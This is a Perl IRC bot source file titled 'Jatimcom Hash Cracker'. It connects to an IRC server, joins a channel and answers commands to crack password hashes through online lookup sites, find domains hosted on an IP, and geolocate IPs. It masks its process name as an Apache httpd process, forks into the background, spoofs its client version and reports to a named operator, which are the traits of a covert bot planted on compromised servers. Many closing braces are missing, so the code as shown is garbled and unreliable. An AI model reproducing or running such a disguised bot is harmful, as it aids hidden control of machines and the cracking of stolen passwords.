Hash Cracker
# Coded by Jatimcom #
# Jatimcom Hash Cracker v2.0 #
# Jatimcom Enterprise #
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
my $fakeproc = "/usr/local/apache/bin/httpd -DSSL";
$ircserver = "irc.mildnet.org";
my $nickname = "JATIMCOM-HASH";
my $ident = "jatimcom";
my $channel = "#jatimcom";
my $runner = "cimpli";
my $fullname = ' 2,1. 12: 10: 11[ 12Jatimcom Hash Cracker 0,1 11] 10: 12: 2. ';
my $ircport = "6667";
my $encrypt = '!enc';
my $decrypt = '!dec';
my $zipcmd = '!zip';
my $ipcmd = '!ip';
my $success = "\n [+] Jatimcom Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
print $success;
$SIG{'PS'} = 'IGNORE';
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep 1;
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :Jatimcom Hash Cracker");
sendraw("PRIVMSG $runner :Hi $runner im here !!!");
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 12 $encrypt <text> | $decrypt <hash> | $zipcmd> <us-zipcode> | $ipcmd <ip/host> | !host <ip/host> | !power | !about 0,1 11] 10: 12: 2. ");
if ($msg=~ /PRIVMSG $channel :!power/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4POWER 0,1 11] 10: 12: 2. MD5 : md5_64bit, md5_128bit, md5(md5_lcase) \& md5(md5_Ucase) ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4POWER 0,1 11] 10: 12: 2. Sha1 : sha1_160bit ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4POWER 0,1 11] 10: 12: 2. MySQL : MySQL_64bit \& MySQL_160bit ");
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4Abouth 0,1 11] 10: 12: 2. Jatimcom Hash Cracker v2.0 ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 0,4«®¤[ 14J 15A 0TIM 15C 15O 14M 0]¤®» ");
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4Pid 0,1 11] 10: 12: 2. Process/ID : 9 $fakeproc - $$ ");
##################################################################### PassCracking.Com Hash Engine - Hash 2 Text
if ($msg=~ /PRIVMSG $channel :$decrypt\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $hash = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 2,1. 12: 10: 11[ 4Jatimcom 0,1 11] 10: 12: 2. Trying to Crack 7 ".$hash." 12... ");
my $cracker = "http://passcracking.com/index.php";
my ($useragent,$request,$response,%form);
undef %form;
$form{datafromuser} = $hash;
$useragent = LWP::UserAgent->new;
$request = POST $cracker,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/([0-9])<\/td><td>(.*)<\/td><td>$hash<\/td><td bgcolor=#FF0000>(.*)<\/td><td>(.*)<\/td><\/tr><tr align=center onMouseOver=/g) {
my ($type,$result) = ($2,$3);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [$type] 4 ".$hash." 12-> 3 ".$result);
elsif ($res =~ m/([0-9])<\/td><td>(.*)<\/td><td>$hash<\/td><td bgcolor=#FF0000>(.*)<\/td><td>/g) {
my ($type,$result) = ($2,$3);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [$type] 4 ".$hash." 12-> 3 ".$result);
elsif ($res =~ m/([0-9])<\/td\><td>(.*)<\/td><td>$hash<\/td><td >[ not found ]/g) {
my $type = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [PassCracking] 7 [$type] 4 ".$hash." 12not found. ");
elsif ($res =~ m/Thanks for NEW pass/g) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [PassCracking] 7 ".$hash." 12is unknown hash. ");
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [PassCracking] 7 ".$hash." 12not found. ");
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Cannot open PassCracking.cOm "); }
##################################################################### GDataOnline.com MD5 Engine - Md5 2 Text
if ($msg=~ /PRIVMSG $channel :$decrypt\s+([0-9,a-f]{32})/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $hash = $1;
my $cracker = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$hash;
my $request = HTTP::Request->new(GET=>$cracker);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/>$hash<\/td><td width="35%"><b>(.*)<\/b>/g) {
my $result = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [GDataOnline] 4 ".$hash." 12-> 3 ".$result);
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [GDataOnline] 4 ".$hash." 12not found."); }
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Cannot open GDataOnline.cOm "); }
##################################################################### md5.rednoize.com MD5 Engine - Md5 2 Text
if ($msg=~ /PRIVMSG $channel :$decrypt\s+([0-9,a-f]{32})/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $hash = $1;
my $cracker = "http://md5.rednoize.com/?s=md5&q=".$hash;
my $request = HTTP::Request->new(GET=>$cracker);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/<div id=\"result\" >(.*)<\/div>/g) {
my $result = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [RedNoize] 4 ".$hash." 12-> 3 ".$result);
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 [RedNoize] 4 ".$hash." 12not found.");
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Cannot open Md5.RedNoize.cOm "); }
##################################################################### c0li.m0de.0n MD5 Engine - Text 2 Hash
if ($msg=~ /PRIVMSG $channel :$encrypt\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $teks=$1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Trying to encrypt 7 ".$teks." 12... ");
my $hashing = "http://d00r.110mb.com/hash.php?enc=".$teks;
my $request = HTTP::Request->new(GET=>$hashing);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/MD5:([0-9,a-f]{32})<br>SHA1:([0-9,a-f]{40})<br>B64:(.*)/g) {
my ($md5,$sha1,$base64) = ($1,$2,$3);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 MD5 : 4 ".$teks." 12-> 3 ".$md5);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Sha1 : 4 ".$teks." 12-> 3 ".$sha1);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Base64 : 4 ".$teks." 12-> 3 ".$base64);
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Cannot open c0li.m0de.0n "); }
##################################################################### www.myipneighbors.com - DOMAIN HOSTED SCANNER
if ($msg=~ /PRIVMSG $channel :!host\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $ipaddr = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Domain in 7 ".$ipaddr." 12Host ... ");
my $hashing = "http://www.myipneighbors.com/?search=".$ipaddr."&commit=search";
my $res = getcontent($hashing);
while ($res =~ m/<tr style=\"background:#dedede;\"><td>(.*)<\/td><td>/g) {
my $dns1 = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 ".$ipaddr." 4-> 3 ".$dns1);
while ($res =~ m/<tr style=\"background:#ffffff;\"><td>(.*)<\/td><td>/g) {
my $dns2 = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 ".$ipaddr." 4-> 3 ".$dns2);
if ($res !~ m/<tr style=\"background:#.*;\"><td>.*<\/td><td>/g) {
if ($res =~ m/<b>$ipaddr<\/b> has address <b>(.*)<\/b>/g) {
$mydns = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 ".$ipaddr." 4-> 3 ".$mydns);
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 ".$ipaddr." 7-> 4 Bad Domain.");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 12 Listing of Domain in 4 ".$ipaddr." 12is Done.");
##################################################################### US ZIP Lookup www.ZIPInfo.com
if ($msg=~ /PRIVMSG $channel :$zipcmd\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $zip = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 Looking up 7 ".$zip." 12ZIP Code ... ");
my $website = "http://www.zipinfo.com/cgi-local/zipsrch.exe?cnty=cnty&ac=ac&zip=".$zip."&Go=Go";
my $request = HTTP::Request->new(GET=>$website);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/<td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font>/g) {
my ($city,$state,$zipcode,$county,$area) = ($1,$2,$3,$4,$6);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 City Name : 3 ".$city." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 State Code : 3 ".$state." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 ZIP Code : 3 ".$zipcode." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 County Name : 3 ".$county." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 Area Code : 3 ".$area." ");
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 7 $zip 4is not a valid ZIP code. "); }
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2US-ZIP 15) 12 Cannot open www.ZIPInfo.com "); }
##################################################################### IP Location - www.ipligence.com
if ($msg=~ /PRIVMSG $channel :$ipcmd\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
} else {
my $ip = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 Searching 7 ".$ip." 12Location ... ");
my $website = "http://www.ipligence.com/geolocation";
my ($useragent,$request,$response,%form);
undef %form;
$form{ip} = $ip;
$useragent = LWP::UserAgent->new;
$request = POST $website,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/Your IP address is (.*)<br>City: (.*)<br\/>Country: (.*)<br>Continent: (.*)<br>Time/g) {
my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 IP Address : 3 ".$ipaddress." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 City : 3 ".$city." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 Country : 3 ".$country." ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 Continent : 3 ".$continent." ");
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 7 $ip 12-> 4Invalid address or IP not found. "); }
else { sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 7@ 2IP-Location 15) 12 Cannot open www.ipligence.com "); }
for (my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line =~ s/\r$//;
unless ($c == $#lines) {
} else {
if ($#lines == 0) {
} elsif ($lines[$c] =~ /\r$/) {
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
} else {
$line_temp = $line;
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
sub getcontent() {
$url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
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